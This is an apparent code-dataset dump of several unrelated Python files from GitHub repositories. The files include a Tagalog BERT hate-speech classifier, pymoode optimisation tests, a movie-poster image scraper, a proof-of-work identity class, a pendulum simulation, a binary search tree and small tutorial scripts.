pickle.dump(getRandomClock().transpose(2, 0, 1)/255, f)\"\"\"\n#clk = getRandomClock()\n#import matplotlib.pyplot as plt\n#plt.imshow(clk)\n\n","repo_name":"aknirala/GAN","sub_path":"freezed/diverseClkFaces.py","file_name":"diverseClkFaces.py","file_ext":"py","file_size_in_byte":11282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74388560193","text":"import os\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport math\n\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom torchmetrics.functional.classification import hamming_distance, precision, recall, f1_score\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nfrom transformers import AutoTokenizer, AutoModel, AdamW, get_cosine_schedule_with_warmup\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping\nimport seaborn as sns\nfrom sklearn.metrics import precision_score, recall_score, f1_score\n\n# import dataset files\ntrain_path = './dataset/train.csv'\nval_path = './dataset/val.csv'\ntest_path = './dataset/test.csv'\ndataset_path = './dataset/mlthsc.csv'\n\ndata_frame = pd.read_csv(dataset_path)\n# print(dataset_data)\n\n# Inspect data # Todo: move to Dataset class\n\nLABELS = ['Age', 'Gender', 'Physical', 'Race', 'Religion', 'Others']\n\nprint(data_frame[LABELS].sum())\n\n# Plot dataset\nplt.xlabel(\"Labels\")\nplt.ylabel(\"No. 
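`getClock` rasterizes the figure through an in-memory raw buffer instead of a file. The same savefig-to-ndarray round trip in isolation (Agg raw output is RGBA; size and dpi match the source's 2.5 in at 72 dpi):

import io
import numpy as np
from matplotlib import figure

fig = figure.Figure()
fig.set_size_inches(2.5, 2.5)
fig.subplots(1)

buf = io.BytesIO()
fig.savefig(buf, format='raw', dpi=72)
buf.seek(0)
img = np.frombuffer(buf.getvalue(), dtype=np.uint8).reshape(int(2.5 * 72), int(2.5 * 72), -1)
buf.close()
print(img.shape)  # (180, 180, 4)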
of instances\")\nplt.title(\"Labels\")\ndata_frame[LABELS].sum().sort_values().plot(kind=\"barh\")\n# plt.show()\n\nclass MLTHS_Dataset(Dataset):\n\n def __init__(self, data_path, tokenizer, labels, max_token_len: int = 128, train_ratio=0.6, test_ratio=0.3):\n self.data_path = data_path\n self.tokenizer = tokenizer\n self.labels = labels\n self.max_token_len = max_token_len\n # self.train_ratio = train_ratio\n # self.test_ratio = test_ratio\n self._prepare_data()\n\n def _prepare_data(self):\n data = pd.read_csv(self.data_path)\n self.data = data\n\n # --------------------- TODO: Normalize ------------------------------------------------\n\n def comment2(self):\n\n # print(\"prepare data\")\n # print(data)\n\n # # Calculate the number of samples for training, testing, and validation\n # total_size = len(data)\n # train_size = int(total_size * self.train_ratio)\n # test_size = int(total_size * self.test_ratio)\n # val_size = total_size - train_size - test_size\n #\n # # Split the data into training, testing, and validation sets\n # train_data = data.sample(n=train_size, random_state=7)\n # remaining_data = data.drop(train_data.index)\n # test_data = remaining_data.sample(n=test_size, random_state=42)\n # val_data = remaining_data.drop(test_data.index)\n\n # self.train_data = train_data\n # self.test_data = test_data\n # self.val_data = val_data\n return None\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n item = self.data.iloc[index]\n text = str(item['Text'])\n labels = item[self.labels]\n\n # Tokenize the text\n encoding = self.tokenizer.encode_plus(text,\n add_special_tokens=True,\n return_tensors='pt',\n padding='max_length',\n truncation=True,\n max_length=self.max_token_len,\n return_token_type_ids=False,\n return_attention_mask=True\n )\n\n # print(encoding[\"input_ids\"].shape, encoding[\"attention_mask\"].shape)\n\n # token_counts = []\n # for _, row in self.data.iterrows():\n # token_count = len(tokenizer.encode(\n # row[\"Text\"],\n # max_length=512,\n # truncation=True\n # ))\n # token_counts.append(token_count)\n # sns.histplot(token_counts)\n # plt.xlim([0, 128])\n\n return {\n 'input_ids': encoding['input_ids'].flatten(),\n 'attention_mask': encoding['attention_mask'].flatten(),\n 'labels': torch.tensor(labels, dtype=torch.float32)\n }\n\nbert_model = \"gklmip/bert-tagalog-base-uncased\"\ntokenizer = AutoTokenizer.from_pretrained(bert_model)\n\nmlths_ds_train = MLTHS_Dataset(train_path, tokenizer, labels=LABELS)\nmlths_ds_val = MLTHS_Dataset(val_path, tokenizer, labels=LABELS)\n\ndef comment():\n return 0\n # mlths_ds_test = MLTHS_Dataset(test_path, tokenizer, labels=LABELS)\n\n # print(dataset_data.iloc[0])\n # print(mlths_ds_train.__getitem__(0))\n\n # train_ids = set(mlths_ds_train.data['ID'])\n # val_ids = set(mlths_ds_val.data['ID'])\n\n # overlapping_ids = train_ids.intersection(val_ids)\n #\n # if not overlapping_ids:\n # print(\"No overlapping IDs between training and validation datasets.\")\n # else:\n # print(\"There are overlapping IDs between training and validation datasets.\")\n\n# Data Module\n\nclass MLTHS_Data_Module(pl.LightningDataModule):\n\n def __init__(self, train_path, val_path, test_path, labels, model_name, batch_size: int = 8, max_token_len: int = 128):\n super().__init__()\n self.train_path = train_path\n self.val_path = val_path\n self.test_path = test_path\n self.labels = labels\n self.model_name = model_name\n self.batch_size = batch_size\n self.max_token_len = max_token_len\n self.tokenizer = 
AutoTokenizer.from_pretrained(model_name)\n\n def setup(self, stage=None):\n if stage in (None, \"fit\"):\n self.train_dataset = MLTHS_Dataset(self.train_path, self.tokenizer, self.labels)\n self.val_dataset = MLTHS_Dataset(self.val_path, self.tokenizer, self.labels)\n self.test_dataset = MLTHS_Dataset(self.test_path, self.tokenizer, self.labels)\n\n if stage == 'predict':\n self.val_dataset = MLTHS_Dataset(self.val_path, self.tokenizer, self.labels)\n\n def train_dataloader(self):\n return DataLoader(self.train_dataset, batch_size=self.batch_size, num_workers=2, shuffle=True)\n\n def val_dataloader(self):\n return DataLoader(self.val_dataset, batch_size=self.batch_size, num_workers=2, shuffle=False, persistent_workers=True)\n\n def test_dataloader(self):\n return DataLoader(self.test_dataset, batch_size=self.batch_size, num_workers=2, shuffle=False)\n \n \n# Model\n\nclass MLTHSClassifier(pl.LightningModule):\n\n def __init__(self, config: dict, n_training_steps=None, n_warmup_steps=None):\n super().__init__()\n self.config = config\n self.pretrained_model = AutoModel.from_pretrained(config['model_name'], return_dict=True)\n self.hidden = nn.Linear(self.pretrained_model.config.hidden_size, self.pretrained_model.config.hidden_size)\n self.classifier = nn.Linear(self.pretrained_model.config.hidden_size, self.config['n_labels'])\n nn.init.xavier_uniform_(self.hidden.weight)\n nn.init.xavier_uniform_(self.classifier.weight)\n self.loss_function = nn.BCEWithLogitsLoss(reduction='mean')\n self.dropout = nn.Dropout()\n\n def forward(self, input_ids, attention_mask, labels=None):\n output = self.pretrained_model(input_ids=input_ids, attention_mask=attention_mask)\n cls_embedding = output.last_hidden_state[:, 0, :]\n cls_embedding = F.sigmoid(cls_embedding)\n logits = self.classifier(cls_embedding)\n loss = 0\n if labels is not None:\n loss = self.loss_function(logits.view(-1, self.config['n_labels']), labels.view(-1, self.config['n_labels']))\n return loss, logits\n\n def training_step(self, batch, batch_index_):\n loss, logits = self(**batch)\n self.log(\"train loss\", loss, prog_bar=True, logger=True)\n return {\n 'loss': loss,\n 'predictions': logits,\n 'labels': batch['labels']\n }\n\n def validation_step(self, batch, batch_index_):\n loss, logits = self(**batch)\n self.log(\"validation loss\", loss, prog_bar=True, logger=True)\n return {\n 'val_loss': loss,\n 'predictions': logits,\n 'labels': batch['labels']\n }\n\n def test_step(self, batch, batch_index_):\n loss, logits = self(**batch)\n return logits\n\n def on_training_epoch_end(self, logits):\n\n labels = []\n predictions = []\n\n for logit in logits:\n for out_labels in logit[\"labels\"].detach().cpu():\n labels.append(out_labels)\n for out_predictions in logit[\"predictions\"].detach().cpu():\n predictions.append(out_predictions)\n\n labels = torch.stack(labels).int()\n predictions = torch.stack(predictions)\n\n\n def configure_optimizers(self):\n optimizer = AdamW(self.parameters(), lr=self.config['lr'], weight_decay=self.config['w_decay'])\n total_steps = self.config['train_size'] / self.config['bs']\n warmup_steps = math.floor(total_steps * self.config['warmup'])\n scheduler = get_cosine_schedule_with_warmup(optimizer, warmup_steps, total_steps)\n return [optimizer], [scheduler]\n\n\n# Trainer\n\nmlths_data_module = MLTHS_Data_Module(train_path, val_path, test_path, labels=LABELS, model_name=bert_model)\nmlths_data_module.setup()\ndl = mlths_data_module.train_dataloader()\n\nprint(\"len(dl)\")\nprint(len(dl))\n\n\nif __name__ == 
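The classifier head above is a single linear layer trained with BCEWithLogitsLoss over six labels. Its shape contract can be checked with random tensors; hidden size 768 is assumed here, matching BERT-base:

import torch
import torch.nn as nn

batch, hidden, n_labels = 8, 768, 6
classifier = nn.Linear(hidden, n_labels)
loss_fn = nn.BCEWithLogitsLoss(reduction='mean')

cls_embedding = torch.randn(batch, hidden)           # stand-in for BERT's [CLS] vector
labels = torch.randint(0, 2, (batch, n_labels)).float()

logits = classifier(cls_embedding)
loss = loss_fn(logits, labels)
probs = torch.sigmoid(logits)                        # per-label probabilities
print(loss.item(), probs.shape)                      # scalar, (8, 6)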
'__main__':\n    config = {\n        'model_name': bert_model,\n        'n_labels': len(LABELS),\n        'bs': 8,\n        'lr': 2e-5,\n        'warmup': 0.2,\n        'train_size': len(dl),\n        'w_decay': 0.01,\n        'n_epochs': 5\n    }\n\n    mlths_data_module = MLTHS_Data_Module(train_path, val_path, test_path, labels=LABELS, model_name=bert_model, batch_size=config['bs'])\n    mlths_data_module.setup()\n    dl = mlths_data_module.train_dataloader()\n\n    device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n    model = MLTHSClassifier(config)\n    idx = 0\n    input_ids = mlths_ds_train.__getitem__(idx)['input_ids']\n    attention_mask = mlths_ds_train.__getitem__(idx)['attention_mask']\n    sample_labels = mlths_ds_train.__getitem__(idx)['labels']  # keep the global LABELS list of label names intact\n    loss, output = model(input_ids.unsqueeze(dim=0), attention_mask.unsqueeze(dim=0), sample_labels.unsqueeze(dim=0))\n    print(loss, output)\n    print(sample_labels.shape, output.shape, output)\n\n    checkpoint_callback = ModelCheckpoint(\n        dirpath=\"checkpoints\",\n        filename=\"best-checkpoint\",\n        save_top_k=1,\n        verbose=True,\n        monitor=\"validation loss\",\n        mode=\"min\"\n    )\n\n    logger = TensorBoardLogger(\"lightning_logs\", name=\"hate-speech\")\n\n    trainer = pl.Trainer(max_epochs=config['n_epochs'], num_sanity_val_steps=2, log_every_n_steps=5, callbacks=[checkpoint_callback], logger=logger)\n    trainer.fit(model, mlths_data_module)\n\n    trainer.test(model, datamodule=mlths_data_module)\n\n    trained_model = MLTHSClassifier.load_from_checkpoint(\n        trainer.checkpoint_callback.best_model_path,\n        config=config\n    )\n\n    trained_model.eval()\n    trained_model.freeze()\n\n    test_comment = \"Masyadong babae tong mga iglesia na ito\"\n    encoding = tokenizer.encode_plus(\n        test_comment,\n        add_special_tokens=True,\n        max_length=128,\n        return_token_type_ids=False,\n        padding=\"max_length\",\n        return_attention_mask=True,\n        return_tensors='pt',\n    )\n    _, test_prediction = trained_model(encoding[\"input_ids\"], encoding[\"attention_mask\"])\n    test_prediction = test_prediction.flatten().numpy()\n    for label, prediction in zip(LABELS, test_prediction):\n        print(f\"{label}: {prediction}\")","repo_name":"syke9p3/BERT-MLTHSC","sub_path":"lumang_code/second_try.py","file_name":"second_try.py","file_ext":"py","file_size_in_byte":11430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"32860958202","text":"import pytest\n\nfrom pymoo.optimize import minimize\nfrom pymoo.problems import get_problem\nfrom pymoo.indicators.igd import IGD\nfrom pymoode.algorithms import GDE3, NSDE\nfrom pymoode.operators.dex import DEX\nfrom pymoode.operators.dem import DEM\nfrom pymoo.algorithms.moo.nsga2 import NSGA2\nfrom pymoo.operators.mutation.pm import PM\nfrom pymoode.survival import RankAndCrowding, ConstrRankAndCrowding\n\n\n@pytest.mark.parametrize('survival', [RankAndCrowding, ConstrRankAndCrowding])\n@pytest.mark.parametrize('crowding_func', [\"mnn\", \"2nn\", \"cd\", \"pcd\", \"ce\"])\ndef test_multi_run(survival, crowding_func):\n    \n    problem = get_problem(\"truss2d\")\n\n    NGEN = 50\n    POPSIZE = 50\n    SEED = 5\n    \n    gde3 = GDE3(pop_size=POPSIZE, variant=\"DE/rand/1/bin\", CR=0.5, F=(0.0, 0.9), de_repair=\"bounce-back\",\n                survival=survival(crowding_func=crowding_func))\n\n    res_gde3 = minimize(problem,\n                        gde3,\n                        ('n_gen', NGEN),\n                        seed=SEED,\n                        save_history=False,\n                        verbose=False)\n    \n    assert len(res_gde3.opt) > 0\n\n\n@pytest.mark.parametrize('crossover', [DEX(), DEM()])\ndef test_multi_frankstein(crossover):\n    \n    problem = get_problem(\"truss2d\")\n\n    NGEN = 100\n    POPSIZE = 100\n    SEED = 5\n    \n    frank = NSGA2(pop_size=POPSIZE, crossover=crossover)\n\n    
res_frank = minimize(problem,\n                         frank,\n                         ('n_gen', NGEN),\n                         seed=SEED,\n                         save_history=False,\n                         verbose=False)\n    \n    assert len(res_frank.opt) > 0\n\n\ndef test_gde3_pm_run():\n    \n    problem = get_problem(\"truss2d\")\n\n    NGEN = 50\n    POPSIZE = 50\n    SEED = 5\n    \n    gde3pm = GDE3(pop_size=POPSIZE, variant=\"DE/rand/1/bin\", CR=0.5, F=(0.0, 0.9), de_repair=\"bounce-back\",\n                  survival=RankAndCrowding(crowding_func=\"pcd\"), genetic_mutation=PM())\n\n    res_gde3pm = minimize(problem,\n                          gde3pm,\n                          ('n_gen', NGEN),\n                          seed=SEED,\n                          save_history=False,\n                          verbose=False)\n    \n    assert len(res_gde3pm.opt) > 0\n    \n    gde3 = GDE3(pop_size=POPSIZE, variant=\"DE/rand/1/bin\", CR=0.5, F=(0.0, 0.9), de_repair=\"bounce-back\",\n                survival=RankAndCrowding(crowding_func=\"pcd\"))\n    \n    res_gde3 = minimize(problem,\n                        gde3,\n                        ('n_gen', NGEN),\n                        seed=SEED,\n                        save_history=False,\n                        verbose=False)\n    \n    # the PM mutation must actually change the resulting front\n    assert abs(res_gde3pm.F - res_gde3.F).sum() >= 1e-3\n    \n\ndef test_multi_perf():\n    \n    problem = get_problem(\"truss2d\")\n    igd = IGD(pf=problem.pareto_front(), zero_to_one=True)\n    \n    NGEN = 250\n    POPSIZE = 100\n    SEED = 5\n    \n    gde3 = GDE3(pop_size=POPSIZE, variant=\"DE/rand/1/bin\", CR=0.5, F=(0.0, 0.9), de_repair=\"bounce-back\",\n                survival=RankAndCrowding(crowding_func=\"cd\"))\n\n    res_gde3 = minimize(problem,\n                        gde3,\n                        ('n_gen', NGEN),\n                        seed=SEED,\n                        save_history=False,\n                        verbose=False)\n    \n    igd_gde3 = igd.do(res_gde3.F)\n    assert abs(igd_gde3 - 0.005859828655308572) <= 1e-8\n    \n    gde3p = GDE3(pop_size=POPSIZE, variant=\"DE/rand/1/bin\", CR=0.5, F=(0.0, 0.9), de_repair=\"bounce-back\",\n                 survival=RankAndCrowding(crowding_func=\"pcd\"))\n\n    res_gde3p = minimize(problem,\n                         gde3p,\n                         ('n_gen', NGEN),\n                         seed=SEED,\n                         save_history=False,\n                         verbose=False)\n    \n    igd_gde3p = igd.do(res_gde3p.F)\n    assert abs(igd_gde3p - 0.004744463013355145) <= 1e-8\n    \n    nsde = NSDE(pop_size=POPSIZE, variant=\"DE/rand/1/bin\", CR=0.5, F=(0.0, 0.9), de_repair=\"bounce-back\",\n                survival=RankAndCrowding(crowding_func=\"pcd\"))\n    \n    res_nsde = minimize(problem,\n                        nsde,\n                        ('n_gen', NGEN),\n                        seed=SEED,\n                        save_history=False,\n                        verbose=False)\n    \n    igd_nsde = igd.do(res_nsde.F)\n    assert abs(igd_nsde - 0.004562068055351625) <= 1e-8","repo_name":"mooscaliaproject/pymoode","sub_path":"tests/test_multi.py","file_name":"test_multi.py","file_ext":"py","file_size_in_byte":4355,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"61"}
{"seq_id":"24585100573","text":"#\n# Discount script\n#\n# Author: @badlydrawnrob\n# Source: https://youtu.be/Kh1Tr1eYghA\n\n\ndef discount(original, sale):\n    # First calculate the difference in price\n    difference = original - sale\n    # Next, divide the difference by original\n    # to get the percent of change as a decimal\n    discountDecimal = difference / original\n    # Finally, we need to multiply by 100\n    # to get the final percentage amount of discount.\n    # You can't use % or \\%: instead use %%\n    discountPercent = discountDecimal * 100\n    print(\"{} discount\".format(discountPercent))\n\n\ndiscount(30, 10)\n","repo_name":"badlydrawnrob/python-playground","sub_path":"personal/discount.py","file_name":"discount.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"33901232245","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# get movie images\nfor year in range(2019, 2014, -1):\n    URL = f\"https://search.daum.net/search?w=tot&q={year}%EB%85%84%EC%98%81%ED%99%94%EC%88%9C%EC%9C%84&DA=MOR&rtmaxcoll=MOR\"\n 
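# request the Daum search page that lists the year's top movies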
\n    res = requests.get(URL)\n    res.raise_for_status()\n\n    soup = BeautifulSoup(res.text, 'lxml')\n    images = soup.find_all(\"img\", attrs={'class': \"thumb_img\"})\n    \n    for i, image in enumerate(images):\n        src = image[\"src\"]\n        if src.startswith('//'):\n            img_URL = \"https:\" + src\n            res_img = requests.get(img_URL)\n            res_img.raise_for_status()\n\n            with open(f\"img/movie_{year}_{i+1}.jpg\", 'wb') as f:\n                f.write(res_img.content)\n        if i == 4: \n            break","repo_name":"ririro93/web-scraping","sub_path":"nadocoding_scraping/12_daum_movie_img.py","file_name":"12_daum_movie_img.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"71718044674","text":"# https://www.geeksforgeeks.org/loops-in-python/ (learn from here)\r\n\r\n'''\r\nwhile True:\r\n    print(\"im joey\")\r\n\r\nwhile loop runs till condition becomes false\r\n'''\r\n\r\n\r\njoey=1\r\nwhile joey<10:\r\n    print(joey)\r\n    joey+=1 # joey=joey+1\r\n\r\n\r\n'''\r\nfor loop\r\n\r\nit can be used in lists,tuples,dict,set,strings\r\n'''\r\n\r\nfor i in range(1,3):\r\n    for j in range(1,11):\r\n        print(i*j,end=\" \")\r\n    print()","repo_name":"xp1oit3r/Python","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"42047932217","text":"import time\nimport math\n\n\ndef prime(n):\n    start = time.time()\n    # include sqrt(n) itself in the candidate range, otherwise squares such as 9 or 25 are reported prime\n    for num in range(2, int(math.sqrt(n)) + 1):\n        x = 0\n        while x < n:\n            for i in range(2, n+1):\n                x = num * i\n                if x == n:\n                    stop = time.time()\n                    print(n, \"is divisible by\", num, \"and\", i)\n                    print(n, \"is not prime\")\n                    print(\"time taken is\", stop-start)\n                    exit()\n    stop = time.time()\n    print(\"time taken is\", stop - start)\n    print(n, \"is prime\")\n\n\ny = int(input(\"Enter value of n\"))\nprime(y)\n","repo_name":"vivekjoshi-96/Interview_questions","sub_path":"prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"40923875432","text":"from __future__ import annotations\n\nfrom utils import hash_content, random_word, create_key, parse_key, verify_hash\nfrom config import id_config\n\nfrom collections import Counter\n\nimport random\n\n\nHASH_DIFFICULTY = id_config[\"hash_difficulty\"]\nNONCE_LIMIT = id_config[\"nonce_limit\"]\nUSERNAME_LIMIT = id_config[\"username_char_limit\"]\n\n\nclass ID(object):\n\n    def __init__(self, username: str, public_key: str, nonce: int = None,\n                 timestamp: str = None, hash_value: str = None):\n\n        if not isinstance(username, str):\n            raise TypeError(\"\\\"username\\\" must be of type str\")\n        elif not isinstance(public_key, str):\n            raise TypeError(\"\\\"public_key\\\" must be of type str\")\n        elif not (nonce is None or isinstance(nonce, int)):\n            raise TypeError(\"\\\"nonce\\\" must be of type int\")\n        elif not (timestamp is None or isinstance(timestamp, str)):\n            raise TypeError(\"\\\"timestamp\\\" must be of type str\")\n        elif not (hash_value is None or isinstance(hash_value, str)):\n            raise TypeError(\"\\\"hash_value\\\" must be of type str\")\n\n        self.__username = username\n        self.__public_key = public_key\n\n        if all([i is None for i in [nonce, timestamp, hash_value]]):\n            # If all extra values are None, hash the content\n\n            self.__hash()\n        elif None in [nonce, timestamp, hash_value]:\n            # If one of the extra values has a value, all must have,\n            # otherwise raise an 
exception\n\n            raise ValueError(\n                \"\\\"nonce\\\", \\\"timestamp\\\" and \\\"hash_value\\\" are dependent, \" +\n                \"either all of them have a value or none of them do.\")\n        else:\n            self.__nonce = nonce\n            self.__timestamp = timestamp\n            self.__hash_value = hash_value\n\n    def __hash(self) -> None:\n        content = {\n            \"username\": self.__username,\n            \"public_key\": self.__public_key\n        }\n\n        content = hash_content(content, HASH_DIFFICULTY, 10**6)\n\n        self.__nonce = content[\"nonce\"]\n        self.__timestamp = content[\"timestamp\"]\n        self.__hash_value = content[\"hash_value\"]\n\n    def to_dict(self) -> dict:\n        \"\"\"Returns all class parameters in a dictionary form\"\"\"\n\n        return {\n            \"username\": self.__username,\n            \"public_key\": self.__public_key,\n            \"nonce\": self.__nonce,\n            \"timestamp\": self.__timestamp,\n            \"hash_value\": self.__hash_value\n        }\n\n    def get_content(self) -> dict:\n        \"\"\"Returns only the class parameters that can be hashed\"\"\"\n\n        return {\n            \"username\": self.__username,\n            \"public_key\": self.__public_key\n        }\n\n    def is_valid(self) -> bool:\n        \"\"\"Verifies if ID is valid or not\"\"\"\n\n        if len(self.__username) > USERNAME_LIMIT:\n            return False\n\n        if self.__nonce > NONCE_LIMIT:\n            return False\n\n        content = {\n            \"username\": self.__username,\n            \"public_key\": self.__public_key,\n            \"nonce\": self.__nonce,\n            \"timestamp\": self.__timestamp,\n        }\n\n        if len(self.__hash_value) < 6:\n            return False\n\n        if self.__hash_value[:HASH_DIFFICULTY] != \"0\" * HASH_DIFFICULTY:\n            return False\n\n        if verify_hash(content, self.__hash_value) is False:\n            return False\n\n        return True\n\n    @staticmethod\n    def is_id_valid(userid: dict) -> bool:\n        \"\"\"Verifies if a dictionary version of an ID is valid or not\"\"\"\n\n        required_keys = [\"username\", \"public_key\",\n                         \"nonce\", \"timestamp\", \"hash_value\"]\n\n        if Counter(userid.keys()) != Counter(required_keys):\n            # If the keys, regardless of order, are not exactly\n            # the expected ones, return False\n\n            return False\n\n        expected_types = {\n            \"username\": str,\n            \"public_key\": str,\n            \"nonce\": int,\n            \"timestamp\": str,\n            \"hash_value\": str\n        }\n\n        if any([not isinstance(value, expected_types[key]) for key, value in userid.items()]):\n            # Return False if any of the id values has a\n            # type other than the expected one\n\n            return False\n\n        candidate = ID(**userid)  # avoid shadowing the built-in id()\n\n        if candidate.is_valid() is False:\n            return False\n\n        return True\n\n    @staticmethod\n    def get_random(valid: bool = True) -> dict:\n        \"\"\"Returns a random ID with its corresponding private key\"\"\"\n\n        key = create_key()\n        pubkey = parse_key(key.publickey())\n        username = random_word(random.randint(1, USERNAME_LIMIT))\n\n        if valid is False:\n            username = \"A\" * (USERNAME_LIMIT+1)\n\n        return {\n            \"private_key\": parse_key(key),\n            \"id\": ID(username, pubkey)\n        }\n","repo_name":"mateusap1/athena-old","sub_path":"model/identity.py","file_name":"identity.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"2511307513","text":"import numpy as np\nimport scipy.integrate as spi\nimport matplotlib.pyplot as plt\n\n\ndef F(Z, t):\n    return np.array([\n        Z[2],\n        Z[3],\n        g * np.cos(Z[1]) + (Z[3] ** 2 - k / m) * Z[0] + k * l0 / m - K * Z[2] / m,\n        -g / Z[0] * np.sin(Z[1]) - (2 * Z[3] + K / m) * Z[2] / Z[0]\n    ])\n\n\ng = 9.81\nm = 5\nk = 500\nl0 = 5e-1\nD = 2.0e-1\nmu = 1.49\nK = 3 * np.pi * mu * D\n\nT = 10\nZ0 = np.array([\n    6e-1,\n    3 * np.pi / 4,\n    0,\n    0\n])\n\nt = np.linspace(0, T, int(T 
* 1000))\nZ = spi.odeint(F, Z0, t)\n\nfig, ax = plt.subplots(subplot_kw={'projection': 'polar'})\nax.plot(Z[:, 1], Z[:, 0])\nax.set_theta_zero_location(\"S\")\nax.grid(True)\nax.set_title(f\"Mouvement d'une boule de {m}kg de diamètre {D}m accroché à un pendule à ressort dans de la glycérine\")\nplt.show()\n","repo_name":"torpill40/clemenceau","sub_path":"yolooo/.ipynb_checkpoints/pendule_ressort-checkpoint.py","file_name":"pendule_ressort-checkpoint.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29031632843","text":"class Node:\n def __init__(self,value):\n self.value = value\n self.left = None\n self.right = None\n\nclass BST:\n def __init__(self):\n self.root = None\n\n def Insert(self,value):\n self.root = self.__Insert(self.root,value)\n\n def __Insert(self,root,value):\n if root is None:\n root = Node(value)\n else:\n if value < root.value:\n root.left = self.__Insert(root.left,value)\n else:\n root.right = self.__Insert(root.right,value)\n\n return root\n\n def Inorder(self):\n return self.__Inorder(self.root)\n\n def __Inorder(self,root):\n if root:\n self.__Inorder(root.left)\n print(root.value)\n self.__Inorder(root.right)\n\n def Preorder(self):\n return self.__Preorder(self.root)\n\n def __Preorder(self,root):\n if root:\n print(root.value)\n self.__Preorder(root.left)\n self.__Preorder(root.right)\n\n def Postorder(self):\n return self.__Postorder(self.root)\n\n def __Postorder(self, root):\n if root:\n self.__Postorder(root.left)\n self.__Postorder(root.right)\n print(root.value)\n\n def Height(self):\n return self.__Height(self.root)\n\n def __Height(self,root):\n if root is None:\n return 0\n else:\n lHeight = self.__Height(root.left)\n rHeight = self.__Height(root.right)\n if lHeight > rHeight:\n return lHeight+1\n else:\n return rHeight+1\n\n def Findmin(self):\n x = self.__Findmin(self.root)\n print(x.value)\n\n def __Findmin(self,root):\n while root is not None:\n if root.left is None:\n break\n root = root.left\n return root\n\n def Findmax(self):\n x = self.__Findmax(self.root)\n print(x.value)\n\n def __Findmax(self,root):\n while root is not None:\n if root.right is None:\n break\n root = root.right\n return root\n\n def Successor(self):\n a = self.__Successor(self.root)\n return a.value\n\n def __Successor(self,root):\n return self.__Findmin(root.right)\n\n def Predeccessor(self):\n a = self.__Predeccessor(self.root)\n return a.value\n\n def __Predeccessor(self,root):\n return self.__Findmin(root.left)\n\n def Delete(self,value):\n return self.__Delete(self.root,value)\n\n def __Delete(self,root,value):\n if root is None:\n return root\n\n if value < root.value:\n root.left = self.__Delete(root.left,value)\n\n elif value > root.value:\n root.right = self.__Delete(root.right,value)\n\n else:\n if root.left is None:\n temp = root.right\n root = None\n return temp\n elif root.right is None:\n temp = root.left\n root = None\n return temp\n\n temp = self.__Findmin(root.right)\n root.value = temp.value\n root.right = self.__Delete(root.right,temp.value)\n return root\n\n\n\nob = 
BST()\nob.Insert(5)\nob.Insert(50)\nob.Insert(40)\nob.Insert(70)\nob.Insert(100)\nob.Insert(110)\nprint(\"---------Inorder-----------\")\nob.Inorder()\nprint(\"---------Preorder-----------\")\nob.Preorder()\nprint(\"---------Postorder-----------\")\nob.Postorder()\nprint(\"---------Height-----------\")\nprint(ob.Height())\nprint(\"---------Minimum-----------\")\nob.Findmin()\nprint(\"---------Maximum-----------\")\nob.Findmax()\nprint(\"---------Successor-----------\")\nprint(ob.Successor())\nprint(\"---------Predeccessor-----------\")\n#print(ob.Predeccessor())\nob.Delete(40)\nob.Delete(100)\nprint(\"---------Inorder-----------\")\nob.Inorder()","repo_name":"mans00rahmed/BinarySearchTree-BST","sub_path":"code 10.py","file_name":"code 10.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"23590454180","text":"#!/bin/python3\nfrom tkinter import *\nfrom random import *\nfrom libcolor import *\n\nmaster = Tk()\n# Window title-bar :)\nmaster.title(\"Change_me\")\ns = 15\nh = s*50\nw = s*50\nbackground = \"black\"\ncnv = Canvas(master, width=w, height=h, bg=background)\ncnv.pack()\nfiles = []\nfor i in range(48):\n    files.append(PhotoImage(file=\"./frames/frame_\" + str(i) + \".png\"))\n# sample the background colour from the first frame's top-left pixel\nr1, g1, b1 = files[0].get(0,0)\nfor f in files:\n    for i in range(50):\n        for j in range(50):\n            r,g,b = f.get(i,j)\n            if (r,g,b)!=(r1,g1,b1):\n                symbols = ['m', \"a\", 'r', \"i\", \"o\"]\n                t = symbols[randint(0,len(symbols)-1)]\n                cnv.create_text(i*s,j*s, text = t, fill = color_code(r,g,b), font = ('Engravers MT', s))\n\n\nmaster.mainloop()\n","repo_name":"Agvantibo/School","sub_path":"mari0/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
